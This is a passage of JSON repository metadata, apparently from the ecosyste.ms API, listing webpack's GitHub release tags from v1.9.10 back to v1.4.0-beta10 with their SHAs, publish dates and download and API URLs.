ebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f